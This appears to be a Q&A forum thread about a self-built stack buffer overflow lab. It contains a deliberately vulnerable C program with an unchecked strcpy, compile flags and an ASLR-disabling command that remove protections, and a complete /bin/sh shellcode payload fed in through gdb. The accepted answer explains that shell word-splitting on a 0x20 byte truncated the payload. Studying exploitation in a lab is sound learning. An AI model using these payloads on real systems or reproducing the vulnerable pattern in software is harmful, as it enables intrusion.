# Why is there the need to use a precise return address for shellcode execution?

Tags: c, return, buffer-overflow, shellcode, stack-pointer

I'm trying to understand why in order to successfully execute my shellcode payload, I need to use a specific return address inside the stack.

If I use a different address that is still inside the stack, I either get a `SIGSEGV segmentation fault` or a `SIGILL illegal instruction`.

---

First of all, I have deactivated ASLR on my OS by doing this :

```sh
echo 0 > /proc/sys/kernel/randomize_va_space
```

---

Here is my vulnerable C code :

```c
#include <string.h>
#include <stdio.h>
#include <stdlib.h>

void func (char *arg) {
  char buffer[64];
  strcpy(buffer, arg);
  printf("%s\n", buffer);
}

int main(int argc, char *argv[])
{
  func(argv[1]);
  return 0;
}
```

---

I compiled it in 32 bit using `gcc` on a 64 bit machine with the following line :

```sh
gcc -z execstack -m32 buffer.c -g -o buffer -fno-stack-protector
```

I thus have an **executable stack** so that the shellcode is executable and also no stack protector to *allow stack smashing*.

---

Here is my shellcode (NOP|shellcode-payload|return-address) :

```py
"\x90"*31 + "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\x30\xd5\xff\xff"
```

---

I feed this shellcode as an input to the `buffer` binary using Python2 to gdb as follow :

```sh
gdb --args ./buffer $(python2 -c 'print("\x90"*31 + "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\x30\xd5\xff\xff")')
```

---

By putting a `break func` in `gdb`, I can print the following bytes showing a bit of the stack.

[image: bytes in the stack]

If I put at the end of the shellcode any return address that is not in the range : `0xffffd521-0xffffd539`. I get either a `SIGSEGV` or `SIGILL` why is that ?

For instance, `0xffffd520` is a valid address inside the stack, for what reason it does not work ?

Comment: Because it is undefined behaviour. And at that point, trying to reason about it is moot. These types of hacks, when done correctly, still require you to try several times until you get lucky and it does what you expected your broken code to do.

Comment: It's hard to say why it doesn't work. You are most likely jumping into data or (possibly unaligned) instructions in the middle of your shellcode. Note that changing the size of your `argv[1]` will effectively move stuff around on the stack too, since program arguments are stored at the bottom of the stack.

Comment: `0xffffd520` has a space as one of its bytes (0x20), and `$(...)` in shell splits on spaces.  So with such an address, I suspect you aren't getting your entire payload into `argv[1]`.    Try checking the values of `argc` and `argv` within the program to confirm.  You need to write `"$(...)"`.

Comment: @NateEldredge You were right about the space, argc is equal to 3 if I use `$(...)` but it goes down to 2 if I use `"$(...)"`. Also `argv` is cut at the end for the return address.

Comment: Could you add your comment as an answer please @NateEldredge ?

Answer (score 2, accepted):

It's not really anything to do with your program or your shellcode, but with the way you are running it.  `$(...)` in shell splits its result into multiple arguments at whitespace, so if the output of `python` contains whitespace bytes, `argv[1]` will only get the part of the payload before the first such byte.  The address `0xffffd520` has `0x20`, space, as one of its bytes, so that'll result in `argv[1]` containing a truncated version of your payload, which in particular won't contain the correct return address at all, hence crashing.

You should use quotes to force the entire output to be a single argument: `"$(python2 ... )"`